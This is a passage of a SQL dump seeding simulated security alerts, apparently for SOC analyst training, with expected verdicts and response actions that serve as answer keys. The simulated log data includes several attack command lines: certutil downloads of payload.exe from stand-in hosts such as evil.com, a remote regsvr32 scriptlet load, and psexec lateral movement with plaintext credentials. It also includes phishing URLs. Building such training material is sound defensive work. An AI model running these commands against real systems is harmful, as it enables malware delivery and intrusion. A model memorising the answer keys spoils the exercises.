page\"}}],\"expected_actions\":[\"block_ip\",\"block_url\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"Spear-phishing attempt with a spoofed IT email targeting user credentials.\"}', 'Advanced', 'TI', 7, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.151Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:00:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.113.55\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"email_sender\\\":\\\"it-support@company-fake.com\\\",\\\"username\\\":\\\"alice.smith@company.com\\\",\\\"hostname\\\":\\\"MAIL-SERVER-02\\\",\\\"url\\\":\\\"https://fake-it-support.com/login\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.151Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:00:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.113.55\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"email_sender\\\":\\\"it-support@company-fake.com\\\",\\\"username\\\":\\\"alice.smith@company.com\\\",\\\"hostname\\\":\\\"MAIL-SERVER-02\\\",\\\"url\\\":\\\"https://fake-it-support.com/login\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.151Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:00:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.113.55\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"email_sender\\\":\\\"it-support@company-fake.com\\\",\\\"username\\\":\\\"alice.smith@company.com\\\",\\\"hostname\\\":\\\"MAIL-SERVER-02\\\",\\\"url\\\":\\\"https://fake-it-support.com/login\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.151Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:00:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.113.55\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"email_sender\\\":\\\"it-support@company-fake.com\\\",\\\"username\\\":\\\"alice.smith@company.com\\\",\\\"hostname\\\":\\\"MAIL-SERVER-02\\\",\\\"url\\\":\\\"https://fake-it-support.com/login\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.151Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:00:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.113.55\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"email_sender\\\":\\\"it-support@company-fake.com\\\",\\\"username\\\":\\\"alice.smith@company.com\\\",\\\"hostname\\\":\\\"MAIL-SERVER-02\\\",\\\"url\\\":\\\"https://fake-it-support.com/login\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1746, 'APT29 Supply Chain Attack Using Certutil', 'critical', 'Recorded Future', 'APT29 suspected to be using certutil for downloading malicious payloads within supply chain compromise.', 'Malware', 'T1105', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T13:05:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.50\",\"hostname\":\"SUPPLY-CHAIN-SERVER-01\",\"command_line\":\"certutil -urlcache -split -f http://malicious-server.com/payload.exe C:\\\\temp\\\\payload.exe\",\"file_hash\":\"abc123def456ghi789jkl012mno345pqr678stu901vwx234yz567abcd890efg12\"}', '2026-03-15 19:52:44', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"certutil -urlcache -split -f http://malicious-server.com/payload.exe C:\\\\temp\\\\payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Certutil command used for downloading malware\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-server.com/payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL hosts malware payload\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"abc123def456ghi789jkl012mno345pqr678stu901vwx234yz567abcd890efg12\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with known malware\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"APT29 leveraging certutil to download and execute malware, indicating a supply chain attack.\"}', 'Advanced', 'TI', 7, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.153Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:05:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"hostname\\\":\\\"SUPPLY-CHAIN-SERVER-01\\\",\\\"command_line\\\":\\\"certutil -urlcache -split -f http://malicious-server.com/payload.exe C:\\\\\\\\temp\\\\\\\\payload.exe\\\",\\\"file_hash\\\":\\\"abc123def456ghi789jkl012mno345pqr678stu901vwx234yz567abcd890efg12\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.153Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:05:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"hostname\\\":\\\"SUPPLY-CHAIN-SERVER-01\\\",\\\"command_line\\\":\\\"certutil -urlcache -split -f http://malicious-server.com/payload.exe C:\\\\\\\\temp\\\\\\\\payload.exe\\\",\\\"file_hash\\\":\\\"abc123def456ghi789jkl012mno345pqr678stu901vwx234yz567abcd890efg12\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.153Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:05:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"hostname\\\":\\\"SUPPLY-CHAIN-SERVER-01\\\",\\\"command_line\\\":\\\"certutil -urlcache -split -f http://malicious-server.com/payload.exe C:\\\\\\\\temp\\\\\\\\payload.exe\\\",\\\"file_hash\\\":\\\"abc123def456ghi789jkl012mno345pqr678stu901vwx234yz567abcd890efg12\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.153Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:05:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"hostname\\\":\\\"SUPPLY-CHAIN-SERVER-01\\\",\\\"command_line\\\":\\\"certutil -urlcache -split -f http://malicious-server.com/payload.exe C:\\\\\\\\temp\\\\\\\\payload.exe\\\",\\\"file_hash\\\":\\\"abc123def456ghi789jkl012mno345pqr678stu901vwx234yz567abcd890efg12\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.153Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:05:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"hostname\\\":\\\"SUPPLY-CHAIN-SERVER-01\\\",\\\"command_line\\\":\\\"certutil -urlcache -split -f http://malicious-server.com/payload.exe C:\\\\\\\\temp\\\\\\\\payload.exe\\\",\\\"file_hash\\\":\\\"abc123def456ghi789jkl012mno345pqr678stu901vwx234yz567abcd890efg12\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1747, 'Suspicious PowerShell Execution with Encoded Commands', 'medium', 'Anomali', 'Detected PowerShell process executing encoded commands, possibly benign administrative activity.', 'Suspicious Activity', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T14:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.10.10\",\"hostname\":\"ADMIN-PC-01\",\"command_line\":\"powershell.exe -enc W1BMAG8AZwBdACAALQBtAGUAcwBzAGEAZwBlACAAIgBDAGgAZQBjAGsAaQBuAGcAIABsAG8AZwBzAC4ALgAuAC4AIgA=\"}', '2026-03-15 19:52:44', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.10.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address executing PowerShell\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -enc W1BMAG8AZwBdACAALQBtAGUAcwBzAGEAZwBlACAAIgBDAGgAZQBjAGsAaQBuAGcAIABsAG8AZwBzAC4ALgAuAC4AIgA=\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Encoded PowerShell command indicative of admin activity\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"suspicious_activity\",\"analysis_notes\":\"Encoded PowerShell commands are often used by administrators for scripting, no malicious intent found.\"}', 'Advanced', 'TI', 7, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.157Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.10.10\\\",\\\"hostname\\\":\\\"ADMIN-PC-01\\\",\\\"command_line\\\":\\\"powershell.exe -enc 
W1BMAG8AZwBdACAALQBtAGUAcwBzAGEAZwBlACAAIgBDAGgAZQBjAGsAaQBuAGcAIABsAG8AZwBzAC4ALgAuAC4AIgA=\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.157Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.10.10\\\",\\\"hostname\\\":\\\"ADMIN-PC-01\\\",\\\"command_line\\\":\\\"powershell.exe -enc W1BMAG8AZwBdACAALQBtAGUAcwBzAGEAZwBlACAAIgBDAGgAZQBjAGsAaQBuAGcAIABsAG8AZwBzAC4ALgAuAC4AIgA=\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.157Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.10.10\\\",\\\"hostname\\\":\\\"ADMIN-PC-01\\\",\\\"command_line\\\":\\\"powershell.exe -enc W1BMAG8AZwBdACAALQBtAGUAcwBzAGEAZwBlACAAIgBDAGgAZQBjAGsAaQBuAGcAIABsAG8AZwBzAC4ALgAuAC4AIgA=\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.157Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.10.10\\\",\\\"hostname\\\":\\\"ADMIN-PC-01\\\",\\\"command_line\\\":\\\"powershell.exe -enc W1BMAG8AZwBdACAALQBtAGUAcwBzAGEAZwBlACAAIgBDAGgAZQBjAGsAaQBuAGcAIABsAG8AZwBzAC4ALgAuAC4AIgA=\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.157Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.10.10\\\",\\\"hostname\\\":\\\"ADMIN-PC-01\\\",\\\"command_line\\\":\\\"powershell.exe -enc W1BMAG8AZwBdACAALQBtAGUAcwBzAGEAZwBlACAAIgBDAGgAZQBjAGsAaQBuAGcAIABsAG8AZwBzAC4ALgAuAC4AIgA=\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1748, 'Regsvr32 Execution Detected, Suspicious but Benign', 'low', 'MISP', 'Regsvr32 used to load a DLL from an internal source, typical of software updates or internal maintenance.', 'Suspicious Activity', 'T1218', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T16:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.50.25\",\"hostname\":\"MAINTENANCE-PC-01\",\"command_line\":\"regsvr32 /s /n /u /i:http://internal-server.com/update.dll scrobj.dll\"}', '2026-03-15 19:52:44', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.50.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address executing regsvr32\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"regsvr32 /s /n /u /i:http://internal-server.com/update.dll scrobj.dll\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Regsvr32 command used for legitimate software update\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://internal-server.com/update.dll\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"clean\",\"details\":\"Internal URL used for software updates\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"suspicious_activity\",\"analysis_notes\":\"Regsvr32 detected from internal source, consistent with legitimate software update processes.\"}', 'Advanced', 'TI', 7, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.159Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T16:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.50.25\\\",\\\"hostname\\\":\\\"MAINTENANCE-PC-01\\\",\\\"command_line\\\":\\\"regsvr32 /s /n /u /i:http://internal-server.com/update.dll scrobj.dll\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.159Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T16:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.50.25\\\",\\\"hostname\\\":\\\"MAINTENANCE-PC-01\\\",\\\"command_line\\\":\\\"regsvr32 /s /n /u /i:http://internal-server.com/update.dll scrobj.dll\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.159Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T16:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.50.25\\\",\\\"hostname\\\":\\\"MAINTENANCE-PC-01\\\",\\\"command_line\\\":\\\"regsvr32 /s /n /u /i:http://internal-server.com/update.dll scrobj.dll\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.159Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T16:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.50.25\\\",\\\"hostname\\\":\\\"MAINTENANCE-PC-01\\\",\\\"command_line\\\":\\\"regsvr32 /s /n /u /i:http://internal-server.com/update.dll scrobj.dll\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.159Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T16:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.50.25\\\",\\\"hostname\\\":\\\"MAINTENANCE-PC-01\\\",\\\"command_line\\\":\\\"regsvr32 /s /n /u /i:http://internal-server.com/update.dll scrobj.dll\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1749, 'APT41 Exploitation Using CertUtil for C2 Communication', 'critical', 'MISP', 'Detected APT41 activity leveraging CertUtil to download a payload from a remote server. The command was executed on an internal host.', 'Malware', 'T1105', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T08:25:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.10.15\",\"dst_ip\":\"203.0.113.99\",\"username\":\"jdoe\",\"hostname\":\"corp-pc-01\",\"command_line\":\"certutil.exe -urlcache -split -f http://evil.com/payload.exe C:\\\\Temp\\\\payload.exe\"}', '2026-03-15 19:53:09', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 123 times for hosting malware\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"certutil.exe -urlcache -split -f http://evil.com/payload.exe C:\\\\Temp\\\\payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"CertUtil abuse detected for downloading malicious payloads\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"APT41 known for exploiting CertUtil to download and execute malicious payloads on targeted hosts.\"}', 'Advanced', 'TI', 7, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.161Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:25:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.10.15\\\",\\\"dst_ip\\\":\\\"203.0.113.99\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"corp-pc-01\\\",\\\"command_line\\\":\\\"certutil.exe -urlcache 
-split -f http://evil.com/payload.exe C:\\\\\\\\Temp\\\\\\\\payload.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.161Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:25:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.10.15\\\",\\\"dst_ip\\\":\\\"203.0.113.99\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"corp-pc-01\\\",\\\"command_line\\\":\\\"certutil.exe -urlcache -split -f http://evil.com/payload.exe C:\\\\\\\\Temp\\\\\\\\payload.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.161Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:25:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.10.15\\\",\\\"dst_ip\\\":\\\"203.0.113.99\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"corp-pc-01\\\",\\\"command_line\\\":\\\"certutil.exe -urlcache -split -f http://evil.com/payload.exe C:\\\\\\\\Temp\\\\\\\\payload.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.161Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:25:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.10.15\\\",\\\"dst_ip\\\":\\\"203.0.113.99\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"corp-pc-01\\\",\\\"command_line\\\":\\\"certutil.exe -urlcache -split -f http://evil.com/payload.exe C:\\\\\\\\Temp\\\\\\\\payload.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.161Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:25:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.10.15\\\",\\\"dst_ip\\\":\\\"203.0.113.99\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"corp-pc-01\\\",\\\"command_line\\\":\\\"certutil.exe -urlcache -split -f http://evil.com/payload.exe C:\\\\\\\\Temp\\\\\\\\payload.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1750, 'Lazarus Group Lateral Movement via PSExec', 'high', 'ThreatConnect', 'Suspected Lazarus Group activity detected using PSExec for lateral movement within the network targeting multiple hosts.', 'Lateral Movement', 'T1569', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T09:14:22Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"192.168.1.20\",\"username\":\"admin\",\"hostname\":\"server-01\",\"command_line\":\"psexec.exe \\\\\\\\192.168.1.20 -u admin -p password cmd.exe\"}', '2026-03-15 19:53:09', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP involved in lateral movement attempt\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"psexec.exe \\\\\\\\192.168.1.20 -u admin -p password cmd.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"PSExec usage consistent with lateral movement techniques\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"PSExec used for unauthorized command execution across the network, indicating lateral movement.\"}', 'Advanced', 'TI', 7, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.176Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:14:22Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server-01\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.20 -u admin -p password 
cmd.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.176Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:14:22Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server-01\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.20 -u admin -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.176Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:14:22Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server-01\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.20 -u admin -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.176Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:14:22Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server-01\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.20 -u admin -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.176Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:14:22Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server-01\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.20 -u admin -p password cmd.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
